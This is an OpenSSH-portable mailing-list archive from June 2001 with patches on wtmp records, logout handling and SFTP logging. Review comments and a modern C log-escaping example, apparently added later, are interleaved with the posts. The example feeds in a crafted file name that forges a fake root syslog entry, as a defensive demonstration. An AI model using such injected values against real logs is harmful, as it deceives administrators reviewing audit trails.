From: tuneki at pb.jp.nec.com (KITAZIMA Tuneki) Date: Thu, 21 Jun 2001 21:59:02 +0900 Subject: Output of last command is strange on Solaris 2.6/8 (OpenSSH 2.9p2) Message-ID: <20010621215902G.tuneki-k@ksp.nis.nec.co.jp> Hi. OS: Solaris 2.6 and 8 OpenSSH: 2.9p2 I found a bug. The output of the last command becomes strange with "UseLogin yes" in sshd_config: two entries are output for a single login. strange case: % last fuga pts/3 bar.foo.co.jp Thu Jun 21 12:45 - 20:02 (07:16) fuga pts/3 bar.foo.co.jp Thu Jan 1 09:00 - 12:45 (11494+03:45) hoge pts/2 foo.bar.co.jp Thu Jun 21 11:12 - 15:30 (04:17) hoge pts/2 foo.bar.co.jp Thu Jan 1 09:00 - 11:12 (11494+02:12) .... When the wtmp_write_entry and wtmpx_write_entry calls in the login_utmp_only function are commented out, last outputs the usual entries. % last fuga pts/3 bar.foo.co.jp Thu Jun 21 12:45 - 20:02 (07:16) hoge pts/2 foo.bar.co.jp Thu Jun 21 11:12 - 15:30 (04:17) ... --- openssh-2.9p2.orig/loginrec.c Wed May 9 05:34:33 2001 +++ openssh-2.9p2/loginrec.c Thu Jun 21 20:23:58 2001 @@ -451,15 +451,19 @@ # ifdef USE_UTMP utmp_write_entry(li); # endif +#ifndef __sun # ifdef USE_WTMP wtmp_write_entry(li); # endif +#endif # ifdef USE_UTMPX utmpx_write_entry(li); # endif +#ifndef __sun # ifdef USE_WTMPX wtmpx_write_entry(li); # endif +#endif return 0; } #endif If there is a proper way to handle this case, please let me know. -- KITAZIMA, Tuneki NEC Informatec Systems,Ltd. tuneki at pb.jp.nec.com Shared Infrastructure and Services Division From mouring at etoh.eviladmin.org Thu Jun 21 22:54:38 2001 
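Review bot: the loginrec.c hunk keys the change on `#ifndef __sun`, a compiler-predefined platform macro, inside a function otherwise controlled by configure-derived feature macros (USE_WTMP, USE_WTMPX); that silently disables wtmp/wtmpx writing for every Solaris build, whether or not UseLogin is set and whether or not login(1) on that system writes the record itself. The function is named login_utmp_only, which suggests wtmp/wtmpx writes do not belong in it on any platform; if that is the intent, drop those two blocks outright (or gate them on a configure-time feature test) rather than on `__sun`. Style: the file indents nested conditionals as `# ifdef`/`# endif`, while the new `#ifndef __sun`/`#endif` pairs sit at column 0 around them, which makes the nesting hard to follow.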
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Thu, 21 Jun 2001 07:54:38 -0500 (CDT) Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621102600.B20678@ws01.aet.tu-cottbus.de> Message-ID: I just updated it as of last night.. There is around 6 new patches including the patch Markus gave. - Ben On Thu, 21 Jun 2001, Lutz Jaenicke wrote: > On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > > Following the code in session.c, session_close_by_channel with > > > s->pid != 0 will "notify child, delay session cleanup". > > > However, session_close() is never called (it would be seen due to > > > debug("session_close: session %d pid %d", s->self, s->pid)) > > > and therefore it seems that session_pty_cleanup(s) (finally calling > > > the record_logout() function) is never called. > > > > i see, there are more changes in current. > > > > could you please try current? > > ??? > > I have applied the patch to the latest version I got from CVS > (:pserver:cvs at bass.directhit.com:/cvs ...), the latest ChangeLog > being: > 20010615 > - (stevesk) don't set SA_RESTART and set SIGCHLD to SIG_DFL > around grantpt(). > - (stevesk) update TODO: STREAMS pty systems don't call vhangup() now > > 20010614 > > Is there another source I should try? > > Best regards, > Lutz > -- > Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE > BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ > Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 > Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 > From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 23:12:15 2001 
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 21 Jun 2001 15:12:15 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010621054326.A17059@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 21, 2001 at 05:43:26AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> Message-ID: <20010621151214.A27941@ws01.aet.tu-cottbus.de> On Thu, Jun 21, 2001 at 05:43:26AM +0200, Markus Friedl wrote: > On Wed, Jun 20, 2001 at 06:08:45PM +0200, Lutz Jaenicke wrote: > > Following the code in session.c, session_close_by_channel with > > s->pid != 0 will "notify child, delay session cleanup". > > However, session_close() is never called (it would be seen due to > > debug("session_close: session %d pid %d", s->self, s->pid)) > > and therefore it seems that session_pty_cleanup(s) (finally calling > > the record_logout() function) is never called. > > i see, there are more changes in current. > > could you please try current? Ok, the CVS mirror has now been updated including the patch :-) It does not work, though :-( The "famous last words" are: debug1: fd 7 setting O_NONBLOCK debug2: fd 3 is O_NONBLOCK debug2: callback done Connection closed by remote host. debug1: channel_free: channel 0: server-session, nchannels 1 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 28025 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 Closing connection to 127.0.0.1 When the connection is closed, the child (in this case 27921) will be killed from session_close_by_channel() with either TERM or HUP. 
However, session_close(), which is responsible for recording the logout, is not called.

Best regards,
Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 21 23:14:37 2001
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke)
Date: Thu, 21 Jun 2001 15:14:37 +0200
Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?]
In-Reply-To: <20010621151214.A27941@ws01.aet.tu-cottbus.de>; from Lutz.Jaenicke@aet.TU-Cottbus.DE on Thu, Jun 21, 2001 at 03:12:15PM +0200
References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de>
Message-ID: <20010621151436.B27959@ws01.aet.tu-cottbus.de>

On Thu, Jun 21, 2001 at 03:12:15PM +0200, Lutz Jaenicke wrote:
> Ok, the CVS mirror has now been updated including the patch :-)
> It does not work, though :-(
> The "famous last words" are:
> debug1: fd 7 setting O_NONBLOCK
> debug2: fd 3 is O_NONBLOCK
> debug2: callback done
> Connection closed by remote host.
> debug1: channel_free: channel 0: server-session, nchannels 1
> debug3: channel_free: status: The following connections are open:
>   #0 server-session (t4 r0 i1/0 o16/0 fd 7/3)
> 
> debug1: channel_free: channel 0: dettaching channel user
> debug1: session_by_channel: session 0 channel 0
> debug1: session_close_by_channel: channel 0 kill 28025
> debug3: channel_close_fds: channel 0: r 7 w 3 e -1
> Closing connection to 127.0.0.1
> 
> When the connection is closed, the child (in this case 27921) will be
                                                         ^^^^^
(This was an old PID from another example, sorry. Read this: 28025)
> killed from session_close_by_channel() with either TERM or HUP.
> However, session_close(), which is responsible for recording the logout,
> is not called.
> 
> Best regards,
> Lutz
> -- 
> Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
> BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
> Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
> Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

-- 
Lutz Jaenicke                             Lutz.Jaenicke at aet.TU-Cottbus.DE
BTU Cottbus               http://www.aet.TU-Cottbus.DE/personen/jaenicke/
Lehrstuhl Allgemeine Elektrotechnik                  Tel. +49 355 69-4129
Universitaetsplatz 3-4, D-03044 Cottbus              Fax. +49 355 69-4153

From jason at dour.org Fri Jun 22 00:59:46 2001
From: jason at dour.org (Jason A . Dour)
Date: Thu, 21 Jun 2001 10:59:46 -0400
Subject: SFTP Logging Redux.
In-Reply-To: ; from rjmooney@aboveground.cx on Wed, Jun 20, 2001 at 04:05:52PM -0400
References: <20010620091208.A18950@dour.org>
Message-ID: <20010621105946.D21713@dour.org>

On Wed, Jun 20, 2001 at 04:05:52PM -0400, Robert Mooney wrote:
> Unless I'm missing something about the functionality of log(), I would
> expect it to come after the open(), and include information as to
> whether or not the action actually succeeded.

Done. All actions are trapped for errors and errors are reported into the log() along with successes.

> Also, a switch to a) turn on logging, and b) set the verbosity of the
> logging would be cool.

A) SSHD always logs. Default level is AUTH.INFO unless otherwise specified. Since SSHD always logs, I see no reason why its subsystems shouldn't automatically log as well.

B) I'm not certain how useful part B would be. Are you saying you still want it logged but you want to alter the log-string based on a verbosity setting (terse versus verbose)? Or do you want the LOGLEVEL of the logging to be user-defined?

> In general, I think it's easier for a developer to turn his back on
> your patch if it's adding functionality without requiring the user
> request it explicitly.

Agreed. However, as I stated above, this puts SFTP logging in line with SSHD logging. I don't see why we should turn it off by default, much less HOW given that use of the log() function requires logging to be active.

> Nice idea though, I would like to see something similar committed.

Latest diff is attached. Comments?

Cheers,
Jason
# "Jason A. Dour"                                 http://dour.org/
# Founder / Executive Producer - PJ Harvey Online - http://pjh.org/

--- sftp-server.c.orig	Tue Jun 19 16:32:45 2001
+++ sftp-server.c	Thu Jun 21 10:55:10 2001
@@ -52,8 +52,14 @@ /* Version of client */ int version; -/* portable attibutes, etc. */ +/* User information. */ +#define CUNAME cuname ? cuname : "UNKNOWN" +struct passwd *upw; +uid_t cuid; +pid_t ppid; +char *cuname; +/* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { @@ -93,6 +99,23 @@ return ret; } +char * +status_to_logstr(int status) +{ + switch (status) { + case SSH2_FX_OK: + return "Successful"; + case SSH2_FX_NO_SUCH_FILE: + return "No such file or directory"; + case SSH2_FX_PERMISSION_DENIED: + return "Permission denied"; + case SSH2_FX_BAD_MESSAGE: + return "Bad message"; + default: + return "Unknown error"; + } +} + int flags_from_portable(int pflags) { @@ -115,6 +138,28 @@ return flags; } +void +sflags_from_portable(char *psflags, int pflags) +{ + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; +} + Attrib * get_attrib(void) { @@ -370,6 +415,7 @@ version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); @@ -382,7 +428,7 @@ { u_int32_t id, pflags; Attrib *a; - char *name; + char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); 
@@ -390,18 +436,22 @@ pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); + log("(%d/%d/%s) File/Dir open failed - %s: %s (%s,%04o)", ppid, cuid, CUNAME, status_to_logstr(status), name, sflags, mode); } else { handle = handle_new(HANDLE_FILE, xstrdup(name), fd, NULL); if (handle < 0) { close(fd); + log("(%d/%d/%s) File/Dir open failed - Could not allocate SFTP handle: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); } else { send_handle(id, handle); status = SSH2_FX_OK; + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); } } if (status != SSH2_FX_OK) 
@@ -591,18 +641,27 @@ TRACE("setstat id %d name %s", id, name); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir permissions failed - %s: %s (%04o).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->perm & 0777); + } else + log("(%d/%d/%s) Set file/dir permissions: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); } if (a->flags & SSH2_FILEXFER_ATTR_ACMODTIME) { ret = utimes(name, attrib_to_tv(a)); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir times failed - %s: %s.", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else + log("(%d/%d/%s) Set file/dir times: %s.", ppid, cuid, CUNAME, name); } if (a->flags & SSH2_FILEXFER_ATTR_UIDGID) { ret = chown(name, a->uid, a->gid); - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir owner/group failed - %s: %s (%d/%d).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->uid, a->gid); + } else + log("(%d/%d/%s) Set file/dir owner/group: %s (%d/%d).", ppid, cuid, CUNAME, name, a->uid, a->gid); } send_status(id, status); xfree(name); @@ -632,8 +691,11 @@ #else ret = chmod(name, a->perm & 0777); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir permissions failed - %s: %s (%04o).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->perm & 0777); + } else + log("(%d/%d/%s) Set file/dir permissions: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); } if (a->flags & SSH2_FILEXFER_ATTR_ACMODTIME) { #ifdef HAVE_FUTIMES 
@@ -641,8 +703,11 @@ #else ret = utimes(name, attrib_to_tv(a)); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir times failed - %s: %s.", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else + log("(%d/%d/%s) Set file/dir times: %s.", ppid, cuid, CUNAME, name); } if (a->flags & SSH2_FILEXFER_ATTR_UIDGID) { #ifdef HAVE_FCHOWN @@ -650,8 +715,11 @@ #else ret = chown(name, a->uid, a->gid); #endif - if (ret == -1) + if (ret == -1) { status = errno_to_portable(errno); + log("(%d/%d/%s) Set file/dir owner/group failed - %s: %s (%d/%d).", ppid, cuid, CUNAME, status_to_logstr(status), name, a->uid, a->gid); + } else + log("(%d/%d/%s) Set file/dir owner/group: %s (%d/%d).", ppid, cuid, CUNAME, name, a->uid, a->gid); } } send_status(id, status); @@ -791,7 +859,13 @@ name = get_string(NULL); TRACE("remove id %d name %s", id, name); ret = unlink(name); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) File deletion failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } @@ -811,7 +885,13 @@ a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); ret = mkdir(name, mode); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Directory creation failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } 
@@ -827,7 +907,13 @@ name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); ret = rmdir(name); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Directory deletion failed - %s: %s", ppid, cuid, CUNAME, status_to_logstr(status), name); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); + } send_status(id, status); xfree(name); } @@ -872,8 +958,15 @@ /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; - } + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) File/Dir renaming failed - %s: %s -> %s", ppid, cuid, CUNAME, status_to_logstr(status), oldpath, newpath); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); + } + } else + log("(%d/%d/%s) File/Dir renaming failed - Target name exists: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); send_status(id, status); xfree(oldpath); xfree(newpath); 
@@ -914,11 +1007,19 @@ oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); - status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; - } + if (ret == -1) { + status = errno_to_portable(errno); + log("(%d/%d/%s) Symbolic link creation failed - %s: %s -> %s", ppid, cuid, CUNAME, status_to_logstr(status), oldpath, newpath); + } else { + status = SSH2_FX_OK; + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); + } + } else + log("(%d/%d/%s) Symbolic link creation failed - Target name exists: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); send_status(id, status); xfree(oldpath); xfree(newpath); @@ -932,6 +1033,7 @@ id = get_int(); request = get_string(NULL); + log("(%d/%d/%s) Extended operation attempted - Ignoring.", ppid, cuid, CUNAME); send_status(id, SSH2_FX_OP_UNSUPPORTED); /* MUST */ xfree(request); } @@ -951,6 +1053,7 @@ msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) 
@@ -1036,10 +1139,27 @@ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); +#else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. */ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); @@ -1073,6 +1193,7 @@ if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } @@ -1082,9 +1203,11 @@ len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); @@ -1095,6 +1218,7 @@ len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From dwd at bell-labs.com Fri Jun 22 02:51:12 2001 
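Review bot: in the first hunk, `#define CUNAME cuname ? cuname : "UNKNOWN"` should be parenthesised as `(cuname ? cuname : "UNKNOWN")` so that it remains one expression wherever it is expanded, not only in the argument-list positions the patch happens to use; `upw` is also only needed inside main() and need not be a global.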
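Review bot: status_to_logstr() only knows four codes and reports everything else as "Unknown error", yet the patch itself logs statuses outside that set (process_open() starts from `status = SSH2_FX_FAILURE`, and errno_to_portable() can return codes not listed); add cases for SSH2_FX_FAILURE, SSH2_FX_EOF and SSH2_FX_OP_UNSUPPORTED so a generic failure is distinguishable from a genuinely unexpected code.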
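Review bot: sflags_from_portable() writes six fixed positions into `psflags` but takes no length, so it silently depends on every caller passing a buffer of at least seven bytes as process_open() does with `sflags[7] = "------"`; either add a `size_t` parameter and check it, or at least document the contract in a comment. The unconditional `psflags++;` after each `if` also reads as if it belonged to the `if` body; braces would make the intent obvious.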
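Review bot: in the process_open() hunk (and every later one) `name` is the client-supplied path from get_string() and goes straight into log(); a path containing a newline or other control characters lets a client write arbitrary-looking lines into the AUTH syslog stream that the admin will read as genuine sftp-server entries. Escape non-printable bytes in client-controlled strings before logging them.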
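Review bot: the process_setstat() hunk repeats each "failed"/"succeeded" log() pair verbatim, and the process_fsetstat() hunks repeat them again; a small helper taking the action string, the status and the name would halve the patch and keep the message formats consistent. Style: `if (ret == -1) { ... } else log(...)` mixes a braced and an unbraced arm; brace both.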
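Review bot: the process_symlink() hunk logs "Symbolic link created: ..." unconditionally right after the TRACE(), before stat() and symlink() run, and then logs the same success line again inside the `else`; drop the first log() call, otherwise a refused or failed symlink still leaves a "created" entry in the log.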
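Review bot: the extended-request hunk logs "Extended operation attempted - Ignoring." without saying which extension was requested; `request` is fetched on the line above, so include it (escaped) in the message so the admin can tell what the client asked for.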
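Review bot: in the main() hunk `cuname = upw->pw_name` keeps a pointer into getpwuid()'s static buffer, which any later getpw*() lookup made on behalf of chown(), chmod() or similar overwrites, so log lines can end up carrying a different user name; use `cuname = xstrdup(upw->pw_name)`. With log_init() now called on both sides of the `#ifdef DEBUG_SFTP_SERVER`, only the level differs, so a single call with a conditional level is clearer than duplicating the line.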
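The two defects the thread touches on, the static getpwuid() buffer behind `cuname` and client-supplied paths being written straight into syslog, can be handled together. The block below is an added example, not code from the patch or from OpenSSH; the function names, the `\xNN` escaping style and the constructed sample values are my own choices. It builds the same "(ppid/uid/user) action: name" line the patch logs, with the name escaped so that control characters cannot forge extra log lines, and takes the user name through getpwuid_r() into caller-owned memory so it cannot go stale.

```c
/* Added example (not part of Jason Dour's patch): build an sftp-server
 * style "(ppid/uid/user) action: name" log line with the client-supplied
 * name escaped, plus a user-name copy that does not alias libc's static
 * passwd buffer. Names and sample values are illustrative. */
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Copy the login name for uid into heap memory owned by the caller.
 * getpwuid() returns a pointer into static storage that later lookups
 * overwrite (the bug the thread fixes with xstrdup()); the reentrant
 * getpwuid_r() with our own buffer avoids that. Returns NULL when the
 * uid has no passwd entry, which the formatter turns into "UNKNOWN". */
char *
dup_user_name(uid_t uid)
{
	struct passwd pw, *result = NULL;
	char buf[4096];

	if (getpwuid_r(uid, &pw, buf, sizeof(buf), &result) != 0 ||
	    result == NULL)
		return NULL;
	return strdup(result->pw_name);
}

/* Escape a string for a single-line log entry: printable ASCII other than
 * backslash is copied, everything else (newlines, terminal control
 * sequences, high bytes) becomes \xNN. Returns the length the full escaped
 * string would need (snprintf convention) so truncation is detectable;
 * only whole escape sequences are written and the output is always
 * NUL-terminated when outlen > 0. */
size_t
log_escape(const char *in, char *out, size_t outlen)
{
	size_t need = 0, w = 0;
	const unsigned char *p;

	for (p = (const unsigned char *)in; *p != '\0'; p++) {
		char piece[5];
		size_t plen;

		if (*p >= 0x20 && *p < 0x7f && *p != '\\') {
			piece[0] = (char)*p;
			plen = 1;
		} else {
			plen = (size_t)snprintf(piece, sizeof(piece), "\\x%02x", *p);
		}
		if (w + plen < outlen) {
			memcpy(out + w, piece, plen);
			w += plen;
		}
		need += plen;
	}
	if (outlen > 0)
		out[w] = '\0';
	return need;
}

/* Format one log line the way the patch's log() calls do, with the
 * untrusted name escaped. user may be NULL, logged as "UNKNOWN" like the
 * CUNAME macro. Returns the snprintf-style length. */
int
format_sftp_log(char *out, size_t outlen, pid_t ppid, uid_t uid,
    const char *user, const char *action, const char *name)
{
	char safe[256];

	log_escape(name, safe, sizeof(safe));
	return snprintf(out, outlen, "(%ld/%ld/%s) %s: %s",
	    (long)ppid, (long)uid, user ? user : "UNKNOWN", action, safe);
}

/* Convenience wrapper returning a static buffer for quick inspection. */
const char *
sftp_log_demo(pid_t ppid, uid_t uid, const char *user, const char *action,
    const char *name)
{
	static char line[512];

	format_sftp_log(line, sizeof(line), ppid, uid, user, action, name);
	return line;
}

int
main(void)
{
	char *me = dup_user_name(getuid());

	/* Constructed sample: a client-chosen name with an embedded newline. */
	printf("%s\n", sftp_log_demo(getppid(), getuid(), me, "File deleted",
	    "/tmp/report.txt\n(1/0/root) File deleted: /etc/passwd"));
	free(me);
	return 0;
}
```

Run stand-alone it prints one line in which the embedded newline appears as `\x0a`, so the forged second entry stays inside the first one instead of becoming a separate syslog record.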
From: dwd at bell-labs.com (Dave Dykstra)
Date: Thu, 21 Jun 2001 11:51:12 -0500
Subject: pw_expire/pw_change in current portable openssh CVS bombs
Message-ID: <20010621115112.A25121@lucent.com>

The references to pw_expire and pw_change in pwcopy() in misc.c cause compilation errors at least on solaris. How about doing a memcpy of the whole structure and only explicitly setting those that need xstrdup? That would work on openbsd and everywhere else.

- Dave Dykstra

--- misc.c.O	Thu Jun 21 11:35:28 2001
+++ misc.c	Thu Jun 21 11:36:09 2001
@@ -125,14 +125,10 @@ { struct passwd *copy = xmalloc(sizeof(*copy)); - memset(copy, 0, sizeof(*copy)); + memcpy(copy, pw, sizeof(*copy)); copy->pw_name = xstrdup(pw->pw_name); copy->pw_passwd = xstrdup(pw->pw_passwd); copy->pw_gecos = xstrdup(pw->pw_gecos); - copy->pw_uid = pw->pw_uid; - copy->pw_gid = pw->pw_gid; - copy->pw_expire = pw->pw_expire; - copy->pw_change = pw->pw_change; #ifdef HAVE_PW_CLASS_IN_PASSWD copy->pw_class = xstrdup(pw->pw_class); #endif

From dwd at bell-labs.com Fri Jun 22 04:08:07 2001
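Review bot: after `memcpy(copy, pw, sizeof(*copy))` every pointer member that is not re-assigned with xstrdup() still aliases the string inside getpw*()'s static buffer, so the copy goes stale on the next lookup; the hunk shows pw_name, pw_passwd, pw_gecos and (under HAVE_PW_CLASS_IN_PASSWD) pw_class being duplicated, so confirm that pw_dir, pw_shell and any other pointer member a platform adds to struct passwd are also xstrdup()'d in the lines below the hunk.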
From: dwd at bell-labs.com (Dave Dykstra) Date: Thu, 21 Jun 2001 13:08:07 -0500 Subject: Patch for changing expired passwords In-Reply-To: <20010619082309.A17644@lucent.com>; from dwd@bell-labs.com on Tue, Jun 19, 2001 at 08:23:09AM -0500 References: <20010618155545.A5924@lucent.com> <20010619143046.A22082@folly> <20010619082309.A17644@lucent.com> Message-ID: <20010621130806.A26314@lucent.com> Markus has now installed a variation on my changes to session.c into openbsd openssh CVS, and Ben has pulled in the session.c changes into the portable openssh CVS, so here is an update of my patch based on the current portable openssh CVS. Markus decided to defer the additional logging I suggested in auth.c, so I left that out. Note: I pointed out to Markus in private email that the line "forced_command = NULL" should not be there in do_exec(), and it is unfortunately in the context of the following diff so if that change gets applied first this might not apply cleanly anymore. - Dave Dykstra --- auth.c.O Mon Jun 18 14:19:54 2001 +++ auth.c Thu Jun 21 11:22:34 2001 @@ -47,6 +47,9 @@ #include "buffer.h" #include "bufaux.h" +/* set when password has expired */ +int forced_passwd_change = 0; + /* import */ extern ServerOptions options; @@ -86,8 +89,12 @@ /* Check password expiry */ if ((spw->sp_lstchg >= 0) && (spw->sp_max >= 0) && - (days > (spw->sp_lstchg + spw->sp_max))) - return 0; + (days > (spw->sp_lstchg + spw->sp_max))) { + if ((pw->pw_uid == 0)) + return 0; + + forced_passwd_change = 1; + } } #else /* Shouldn't be called if pw is NULL, but better safe than sorry... */ --- auth.h.O Tue Jun 5 15:25:06 2001 +++ auth.h Mon Jun 18 14:28:04 2001 @@ -35,6 +35,9 @@ #include #endif +/* set when password has expired */ +extern int forced_passwd_change; + typedef struct Authctxt Authctxt; typedef struct KbdintDevice KbdintDevice; --- session.c.O Thu Jun 21 11:09:30 2001 +++ session.c Thu Jun 21 11:16:42 2001 
